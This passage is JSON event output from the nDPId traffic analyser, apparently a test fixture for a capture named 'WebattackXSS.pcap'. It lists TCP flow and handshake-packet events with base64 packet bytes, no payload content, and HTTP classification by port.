+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347618757,"flow_last_seen":1499347618757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347618757,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1499347618757,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347618757,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UcRAAD4GdAysEAABwKgKMub0AFCevDJ5AAAAAKACchBBkQAAAgQFtAQCCAoBO2O9AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":2,"flow_last_seen":1499347618757,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347618757,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5vRXo2m0nrwyeqAScSBIAQAAAgQFtAQCCAoD5TUyATtjvQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":3,"flow_last_seen":1499347618758,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347618758,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UcVAAD4GdBOsEAABwKgKMub0AFCevDJ6V6NptYAQAOXnBwAAAQEICgE7Y74D5TUy"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347621256,"flow_last_seen":1499347621256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347621256,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1499347621256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347621256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Hc9AAD4GqAGsEAABwKgKMucOAFD+NnvhAAAAAKACchCWIwAAAgQFtAQCCAoBO2YuAAAAAAEDAwc="} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":2,"flow_last_seen":1499347621256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347621256,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5w6DP0I9\/jZ74qAScSCV\/QAAAgQFtAQCCAoD5TejATtmLgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":3,"flow_last_seen":1499347621257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347621257,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HdBAAD4GqAisEAABwKgKMucOAFD+Nnvigz9CPoAQAOU1BQAAAQEICgE7Zi4D5Tej"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347622524,"flow_last_seen":1499347622524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347622524,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1499347622524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347622524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QPZAAD4GhNqsEAABwKgKMuccAFAFlCedAAAAAKACchDhvwAAAgQFtAQCCAoBO2drAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":2,"flow_last_seen":1499347622524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347622524,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5xwFxGkkBZQnnqAScSA28QAAAgQFtAQCCAoD5TjgATtnawEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":3,"flow_last_seen":1499347622525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347622525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QPdAAD4GhOGsEAABwKgKMuccAFAFlCeeBcRpJYAQAOXV+AAAAQEICgE7Z2sD5Tjg"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347623786,"flow_last_seen":1499347623786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347623786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1499347623786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347623786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EPlAAD4GtNesEAABwKgKMucqAFD89nheAAAAAKACchCYUQAAAgQFtAQCCAoBO2inAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":2,"flow_last_seen":1499347623786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347623786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5yptg31h\/PZ4X6AScSBwSgAAAgQFtAQCCAoD5TocATtopwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":3,"flow_last_seen":1499347623787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347623787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EPpAAD4GtN6sEAABwKgKMucqAFD89nhfbYN9YoAQAOUPUgAAAQEICgE7aKcD5Toc"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347625094,"flow_last_seen":1499347625094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347625094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1499347625094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347625094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QvlAAD4GgtesEAABwKgKMuc4AFBpNSsUAAAAAKACchB4CQAAAgQFtAQCCAoBO2ntAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":2,"flow_last_seen":1499347625094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347625094,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5zhhGRuGaTUrFaAScSC9AAAAAgQFtAQCCAoD5TtjATtp7QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5502,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":3,"flow_last_seen":1499347625095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347625095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QvpAAD4Ggt6sEAABwKgKMuc4AFBpNSsVYRkbh4AQAOVcBwAAAQEICgE7ae4D5Ttj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347626349,"flow_last_seen":1499347626349,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347626349,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1499347626349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347626349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CphAAD4GuzisEAABwKgKMudGAFA4VWG\/AAAAAKACchBw9gAAAgQFtAQCCAoBO2snAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":2,"flow_last_seen":1499347626349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347626349,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ50a6Rl2POFVhwKAScSAZfgAAAgQFtAQCCAoD5TycATtrJwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5513,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":3,"flow_last_seen":1499347626351,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347626351,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CplAAD4Guz+sEAABwKgKMudGAFA4VWHAukZdkIAQAOW4hAAAAQEICgE7aygD5Tyc"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347627616,"flow_last_seen":1499347627616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627616,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1499347627616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347627616,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GbxAAD4GrBSsEAABwKgKMudUAFBilXXYAAAAAKACchAxUgAAAgQFtAQCCAoBO2xkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":2,"flow_last_seen":1499347627616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347627616,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ51QwQXQsYpV12aAScSBMBQAAAgQFtAQCCAoD5T3ZATtsZAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5524,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":3,"flow_last_seen":1499347627617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347627617,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Gb1AAD4GrBusEAABwKgKMudUAFBilXXZMEF0LYAQAOXrDAAAAQEICgE7bGQD5T3Z"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 